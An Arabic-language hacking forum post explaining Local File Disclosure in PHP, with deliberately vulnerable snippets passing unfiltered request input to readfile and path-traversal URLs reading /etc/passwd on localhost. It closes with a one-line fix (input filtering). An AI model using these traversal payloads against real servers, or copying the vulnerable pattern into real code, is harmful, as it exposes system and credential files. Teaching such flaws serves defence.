W3lc0m3 Fighter.




XBlackEGWhat is Local File Disclosure (LFD) ?

XBlackEG Offline
#1
Code:
السلام عليكم ورحمه الله وبركاته


انهارده معانا شرح ثغره من ثغرات القرأه علي السيرفر اسمها
Local File Disclosure
config.php الثغره دي من خلالها تقدر تقرا اي ملف علي الموقع او السيرفر يكون واخد تصاريح قرأه زي مثلا ملف 
الدوال اللي بتسبب الثغره دي

Code:
1.file_get_contents
2.readfile
3.file
4.fopen
5.highlight_file
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
6.show_source - Alias of highlight_file()

LFمن خلال الداول دي بدون فلاتر نقدر نوصل ل 
تعالو ناخد كود فيه داله مصابة

Code:
<?php
$xp10=$_GET['xp10'];
readfile($xp10);
?>

تقدر تقرا اي ملف وبنحدد الملف عن طريق الاستغلال readfile في الكود هنا الداله  

Code:
http://127.0.0.1/file.php?xp10=../../../../../../etc/passwd

طب ناخد مثال كمان عشان نقرب الفكره اكتر



Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();



readfile والمتغير ده موجود في السطر قبل الاخير مع دالة $REQUEST مش متفلتر وعملنا له استدعاء بريكويست $fileهنا في الكود ده لو خدت بالك هتلاقي متغير 
والاستغلال هيكون بالشكل ده
Code:
http://127.0.0.1/download.php?file=../../../../../../etc/passwd

وطريقه الترقيع هتكون من خلال فلتره المدخلات 
:RpS_cool:
Reply





Users browsing this thread:
1 Guest(s)



ABOUT Team of the X-fighter

All Right Reserved © Xp10.site